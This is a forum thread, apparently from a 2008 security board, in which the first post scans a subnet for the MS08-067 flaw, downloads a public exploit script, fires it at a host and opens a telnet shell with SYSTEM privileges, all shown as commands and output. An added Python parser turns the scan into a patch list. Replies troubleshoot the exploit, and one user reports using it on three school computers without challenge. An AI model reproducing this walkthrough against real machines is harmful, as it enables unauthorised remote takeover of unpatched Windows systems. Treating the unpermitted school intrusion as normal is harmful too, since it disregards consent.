Page 1 of 5
Results 1 to 10 of 41

Thread: Playing with ms08_067

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Playing with ms08_067

    So since some other people have posted some stuff on this exploit I figured I'd see what I could add. The first really cool thing I found (thanks Arkaic) was a script for nmap which checks for the vulnerability. If anyone is unfamiliar with the nmap scripting engine you are really missing out. Maybe if there is some demand we can do a write-up on it later. So we need to check out an experimental branch of nmap in order to get the needed libraries for it to work. If your nmap breaks because of this it's not my fault. Mine is fine so yours should be as well. Ok here we go
    Code:
    b4cktr4ck3 / # svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/ron
    b4cktr4ck3 / # cd ron/nmap-smb
    b4cktr4ck3 nmap-smb # ./configure
    b4cktr4ck3 nmap-smb # make
    b4cktr4ck3 nmap-smb # make install
    Ok so all we did was rebuild nmap with a new branch. This actually gives us a bunch of new scripts to check out but for the sake of this post we will only use one. So now we can run a scan. The reason I searched this out is because the metasploit module to do the scan test (to my knowledge) only does one host at a time. I was looking to cover subnets if need be.

    Okay so let's run our new script...
    Code:
    b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse  -p 445 192.168.1.0/24 
    
    Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
    Interesting ports on firewall.localhost.com (192.168.1.1):
    PORT    STATE    SERVICE
    445/tcp filtered microsoft-ds
    MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)
    
    Interesting ports on 192.168.1.127:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    
    Interesting ports on 192.168.1.128:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    MAC Address: 00:04:4B:18:69:8A (Nvidia)
    
    Interesting ports on 192.168.1.237:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:0C:29:4A:B6:6D (VMware)
    
    Host script results:
    |_ smb-check-vulns: This host is vulnerable to MS08-067
    
    Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds
    As you can see we have a victim...er winner!

    So just so this post won't be so short and lame we can also go ahead and see if we can pop this box. For this trick I'll go to milw0rm and grab a recent .py sploit on the subject.
    Code:
    b4cktr4ck3 / # wget http://www.milw0rm.com/exploits/download/7132.py
    --13:45:35--  http://www.milw0rm.com/exploits/download/7132.py
               => `7132.py'
    Resolving www.milw0rm.com... 76.74.9.18
    Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/plain]
    
        [ <=>                              ] 7,085         --.--K/s             
    
    13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
    Ok so if you open up the exploit (which you should always do) and give it a quick read you will see there is a Windows 2003 payload (#2) and a 2000 payload (#1) {thanks to TheX1le} so due to our scan results we are going to need 2003 so...
    Code:
    b4cktr4ck3 / # python 7132.py 192.168.1.237 2
    #######################################################################
    #   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
    #   www.hackingspirits.com
    #   www.coffeeandsecurity.com
    #   Email: d3basis.m0hanty @ gmail.com
    #######################################################################
    
    [-]Windows 2003[SP2] payload loaded
    [-]Initiating connection
    [-]connected to ncacn_np:192.168.1.237[\pipe\browser]
    [-]Exploit sent to target successfully...
    [1]Telnet to port 4444 on target machine...
    Cool, seems we have successfully "popped" the box so let's see...
    Code:
    b4cktr4ck3 / # telnet 192.168.1.237 4444
    Trying 192.168.1.237...
    Connected to 192.168.1.237.
    Escape character is '^]'.
    Microsoft Windows [Version 5.2.3790]
    (C) Copyright 1985-2003 Microsoft Corp.
    
    C:\WINDOWS\system32>
    Very Nice!
    Code:
    C:\WINDOWS\system32>whoami
    whoami
    nt authority\system
    Well that's it for this post. If you found any of this info helpful please let me know and I will post more how-tos on this type of thing, otherwise just tell me I suck and I'll go back to moderating with an iron fist
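    The scan output above is the useful defensive artifact in this thread: it tells you which hosts on a subnet still lack the MS08-067 update (KB958644) so they can be patched. As an added example (not part of the original post, nor code from the nmap project), the Python below parses nmap normal output in the 4.76 format shown above and turns it into a patch-status list. The sample input reuses the hosts from the post and adds one constructed host, 192.168.1.240, with an assumed "not vulnerable" verdict line so the parser has both outcomes to tell apart; the exact wording of a negative verdict is an assumption.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the nmap 4.76 normal-output format shown in the post.
# 192.168.1.240 and its "not vulnerable" line are assumptions added for contrast.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)

Interesting ports on 192.168.1.127:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Interesting ports on 192.168.1.237:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)

Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067

Interesting ports on 192.168.1.240:
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_ smb-check-vulns: This host is not vulnerable to MS08-067

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds
"""

HOST_RE = re.compile(r"^Interesting ports on (?P<label>.+):$")
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)$")
SCRIPT_RE = re.compile(r"^\|_?\s*smb-check-vulns:\s*(?P<text>.+)$")


@dataclass
class HostResult:
    ip: str
    hostname: Optional[str] = None
    smb_state: Optional[str] = None  # nmap state of 445/tcp: open, closed, filtered
    verdict: Optional[str] = None    # text after "smb-check-vulns:", if the script ran

    @property
    def status(self) -> str:
        """vulnerable: positive verdict; unverified: SMB open but no verdict; ok: otherwise."""
        if self.verdict is not None:
            text = self.verdict.lower()
            if "vulnerable" in text and "not vulnerable" not in text:
                return "vulnerable"
            return "ok"
        return "unverified" if self.smb_state == "open" else "ok"


def parse_nmap_output(text: str) -> List[HostResult]:
    """Walk nmap normal output and record, per host, the 445/tcp state and script verdict."""
    hosts: List[HostResult] = []
    current: Optional[HostResult] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            label = m.group("label")
            if label.endswith(")"):          # "name (ip)" form
                name, ip = label[:-1].rsplit(" (", 1)
            else:                            # bare "ip" form
                name, ip = None, label
            current = HostResult(ip=ip, hostname=name)
            hosts.append(current)
            continue
        if current is None:
            continue                         # banner lines before the first host
        m = PORT_RE.match(line)
        if m and m.group("proto") == "tcp" and m.group("port") == "445":
            current.smb_state = m.group("state")
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current.verdict = m.group("text").strip()
    return hosts


def hosts_needing_patch(results: List[HostResult]) -> List[str]:
    """IPs the script flagged, i.e. hosts still missing the MS08-067 update (KB958644)."""
    return [h.ip for h in results if h.status == "vulnerable"]


def unverified_hosts(results: List[HostResult]) -> List[str]:
    """445/tcp open but no verdict: the script did not decide, so do not tick these as clean."""
    return [h.ip for h in results if h.status == "unverified"]


def report(text: str) -> str:
    results = parse_nmap_output(text)
    lines = [f"{len(results)} hosts parsed"]
    for h in results:
        label = f"{h.ip} ({h.hostname})" if h.hostname else h.ip
        lines.append(f"  {label:45} 445/tcp={h.smb_state or 'n/a':9} {h.status.upper()}")
    lines.append("needs KB958644: " + (", ".join(hosts_needing_patch(results)) or "none"))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_NMAP_OUTPUT))
```

    Hosts with 445/tcp open but no verdict are reported separately rather than as clean, because a missing script result means the check did not run, not that the patch is present.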

  2. #2
    fastboi
    Guest

    However, I just used the perl script, and got the following.
    Code:
    bt ~ # python 7132.py 192.168.1.102 2
    #######################################################################
    #   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
    #   www.hackingspirits.com
    #   www.coffeeandsecurity.com
    #   Email: d3basis.m0hanty @ gmail.com
    #######################################################################
    
    [-]Windows 2003[SP2] payload loaded
    [-]Initiating connection
    [-]connected to ncacn_np:192.168.1.102[\pipe\browser]
    [-]Exploit sent to target successfully...
    [1]Telnet to port 4444 on target machine...
    bt ~ # telnet 192.168.1.102 4444
    Trying 192.168.1.102...
    telnet: connect to address 192.168.1.102: Connection refused
    bt ~ #

    It's an SP3 XP machine with the required port open, but maybe because it is SP3, it is not working. The perl script could be more intelligent, and give a message that the payload was not successful or something of that nature.

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    The exploit is only for Windows Server 2003 or 2000 which have not been patched in the last few months. The exploit is not mine. I merely used it to complete the post. Yes, the error handling is pretty bad in the script but like I said I just borrowed it.

  4. #4
    fastboi
    Guest

    Yeah, I always miss things. 1 = Win 2000, 2 = Win 2003 [SP2]. I got tricked by SP2... somehow I thought it's Win 2003 and XP SP2 compatible, lol. Thanks anyway.

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    5

    awesome! :)

    Very nice post Pure!

    Just for info...

    We can do the same with metasploit and the "old" nmap+db_autopwn, but with metasploit we can reach more targets, because it is prepared for more Windows languages.

    btw, thanks, very nice post!

    cheers!

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Quote Originally Posted by thebug
    Very nice post Pure!

    Just for info...

    We can do the same with metasploit and the "old" nmap+db_autopwn, but with metasploit we can reach more targets, because it is prepared for more Windows languages.

    btw, thanks, very nice post!

    cheers!
    I would never use autopwn in a real test situation. It's far too noisy. Also the "old" nmap as you put it does not do what this nmap script does. The script checks the port and then reports whether it's vulnerable or not.

  7. #7
    Lammer
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    11

    Great!

    Very nice how-to pureh@te.
    I think this kind of info is very, very useful.
    Please keep sending them.

  8. #8
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    6

    I was able to successfully sploit 3 Windows XP SP2 boxes at school with this technique just today. I don't know about SP3 though.

  9. #9
    ShadowKill
    Senior Member
    Join Date
    Dec 2007
    Posts
    908

    Quote Originally Posted by anonymoususer
    I was able to successfully sploit 3 Windows XP SP2 boxes at school with this technique just today. I don't know about SP3 though.
    With permission of course........



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  10. #10
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Tested on an XP box with SP3 and it worked as well. Just for info, reading the paper about that exploit says it will work if the system is not patched with the Windows update KB958644.
